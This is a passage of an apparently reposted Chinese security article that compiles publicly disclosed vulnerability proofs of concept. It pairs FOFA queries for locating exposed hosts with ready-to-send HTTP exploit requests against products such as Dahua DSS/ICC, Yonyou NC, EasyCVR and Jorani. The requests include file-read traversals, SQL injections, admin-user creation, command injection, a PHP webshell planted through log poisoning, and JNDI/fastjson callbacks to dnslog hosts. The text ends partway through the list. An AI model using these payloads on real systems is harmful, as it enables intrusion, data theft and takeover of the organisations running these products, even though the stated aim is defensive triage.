Collection of Publicly Disclosed Internet Vulnerabilities, 2023-09 to 2024-06 (repost)

Posted 2024-6-5 14:31:29
Collection of Publicly Disclosed Internet Vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界; author: 网络安全新视界

Purpose: Exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive and defensive operations; we hope this article is of some help to defenders. Defensive teams can use its contents for risk triage.

Sources: This article covers 203 publicly disclosed high-severity vulnerability POCs, domestic and international, from September 2023 to May 2024. All were taken from other public accounts or websites on the internet and were compiled and published by the 网络安全新视界 team.

Patches: All vulnerabilities listed are public; for patches or remediation guidance, contact the product vendor.

Content: Because of length limits, a few POCs that are too long have been replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal: If any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the backend to have it removed.

Statement

To keep the process simple and make browsing easy, there is no "reply to get the full list". This article is the most complete version to date; when using it, press F12 and search for keywords.

Bookmark this article if you find it useful. You can also follow this public account (网络安全新视界).

Contents
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPtech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-pass smart management platform 1.0.55.0.0.1 privilege bypass
66. Wanhu ezOFFICE collaboration management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 mobile campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒 明御 security gateway aaa_local_web_preview file upload
88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing 百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. Beijing 百绰智能 S20 backend sysmanageajax.php SQL injection
120. Beijing 百绰智能 S40 management platform import web.php arbitrary file upload
121. Beijing 百绰智能 S42 management platform userattestation.php arbitrary file upload
122. Beijing 百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. Fujian 科立讯 communications command and dispatch platform down_file.php SQL injection
138. Fujian 科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. Fujian 科立讯 communications command and dispatch platform editemedia.php SQL injection
140. Fujian 科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. Fujian 科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD licence-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou 图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behaviour management system send_order.cgi command execution
196. Henan 风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋影视 management system dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 hash of the password of your choice.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging in to the backend with the default admin account, perform the following:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=第一步登录获取的cookie
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value from the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: the function that executes base64-encoded input.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the test target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version = NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
